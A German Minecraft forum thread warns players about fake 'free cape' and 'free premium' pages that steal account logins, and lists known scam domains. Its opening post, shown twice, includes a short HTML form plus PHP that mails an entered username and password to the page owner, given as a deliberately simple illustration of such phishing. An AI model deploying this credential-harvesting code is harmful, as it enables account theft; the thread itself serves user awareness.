Achtung!

Status
Für weitere Antworten geschlossen.

benbas39

Mitglied
5 Juli 2014
1.013
1.155
1.255
Irgendwie irgendwo
twitter.com
Hey,

in letzter Zeit sind mir des Öfteren gewisse Personen in der Gommunity aufgefallen, welche Texte wie "Holt euch ein gratis MineconCape hier --> xyz.xyz <-- Zum öffnen einfach klicken!" geschickt haben.

Wenn man darauf klickt, kommt man auf zum Beispiel so eine Seite: JhLaEvP.png
Anders werben diese auch mit "Gratis Premium hier", oder "Free Minecraft Accounts" etc.
Das sind sogenannte "Keylogger", oder "Scam"-Seiten. Diese Formulare sind reine Tarnung, denn sie können deine Minecraft-Daten überhaupt nicht überprüfen!
Das einzige was sie machen ist, die Informationen die du eingegeben hast, dem Besitzer der Seite auf direktem Wege zu übermitteln.
Jetzt hat er eure Daten und wird sie entweder verkaufen, oder zum hacken verwenden.

Also bitte seid vorsichtig! Heutzutage kann jeder so einen Code innerhalb einer Minute schreiben. In meinem Beispiel werden die Daten per Mail versendet:
PHP:
<html>
    <body>
        <form method="post">
            <input type="text" name="username" placeholder="Minecraft-Username">
            <input type="password" name="password" placeholder="Passwort">
            <input type="submit" name="submit" value="Absenden">
        </form>
    </body>
</html>

<?php
if(isset($_POST["submit"])) {
    mail("[email protected]", "Account", $_POST["username"]. $_POST["password"]);
}
?>
(Code ist mit Absicht so simpel gehalten und soll veranschaulichen, wie einfach es ist, eingegebenen Daten per Mail zu versenden.)

Ich hoffe ich konnte wenigstens ein paar Leuten die Augen öffnen.

- benbas39

-----------------------------------------------
Sammelliste aller bekannten Links:

- GRATISCAPE.XYZ

Zuletzt bearbeitet:
Hey,

in letzter Zeit sind mir des Öfteren gewisse Personen in der Gommunity aufgefallen, welche Texte wie "Holt euch ein gratis MineconCape hier --> xyz.xyz <-- Zum öffnen einfach klicken!" geschickt haben.

Wenn man darauf klickt, kommt man auf zum Beispiel so eine Seite: Anhang anzeigen 156035
Anders werben diese auch mit "Gratis Premium hier", oder "Free Minecraft Accounts" etc.
Das sind sogenannte "Keylogger"-Seiten. Diese Formulare sind reine Tarnung, denn sie können deine Minecraft-Daten überhaupt nicht überprüfen!
Das einzige was sie machen ist, die Informationen die du eingegeben hast dem jeweiligen Besitzer der Seite auf direktem Wege zu schicken.
Jetzt hat er eure Daten und wird sie entweder verkaufen, oder zum hacken verwenden.

Also bitte seid vorsichtig! Heutzutage kann jeder so einen Code in einer Minute schreiben. In meinem Beispiel werden die Daten per Mail versendet:
HTML:
<html>
    <body>
        <form method="post">
            <input type="text" name="username" placeholder="Minecraft-Username">
            <input type="password" name="password" placeholder="Passwort">
            <input type="submit" name="submit" value="Absenden">
        </form>
    </body>
</html>
PHP:
<?php
if(isset($_POST["submit"])) {
    mail("[email protected]", "Account", $_POST["username"]. $_POST["password"]);
}
?>

Ich hoffe ich konnte wenigstens ein paar Leuten die Augen öffnen.

- benbas39
-----------------------------------------------
Sammelliste alle bekannten Links:

- GRATISCAPE.XYZ
Danke, dadurch hast du vielen Nutzern einen großen Gefallen getan. Diese Leute sollten einen Ban bekommen, denn sie informieren einen nicht richtig über die Risiken :D

Ja, deshalb sollte es ja bannbar sein.
Es ist bannbar, das habe ich letztens extra nachgefragt. https://www.gommehd.net/forum/threads/ist-offensichtlicher-betrug-strafbar.430297/
Ich habe in der letzten Woche schon fünf Leute wegen Cape-Betrug gemeldet. Die einen fragen dreist gleich nach E-Mail und Passwort, der andere schickt nur Scamlinks.
Man braucht, um einem anderen Spieler ein Optifine oder Labymod Cape zu kaufen oder auf den Spieler eines umzuziehen, KEINE Accountdaten! Nur den IGN und bei Optifine eine E-Mail Adresse für eine Bestätigung. Kein Dienst braucht ein Passwort dafür!
@benbas39 adde mal zur Liste: optifne.tk

~Ted

• Like
Reaktionen: LordChickenWing_
*****.tk
Die ist glaube ich schon wieder offline, oder du hast einen Schreibfehler gemacht.

Zuletzt bearbeitet von einem Moderator:
Status
Für weitere Antworten geschlossen.

Soziale Medien

• X
  • TikTok

Über uns

• GommeHD.net ist einer der größten Minecraft-Server der Welt. Dir gefällt unser Server? Dann unterstütze uns durch einen Kauf im Shop!
  • Shop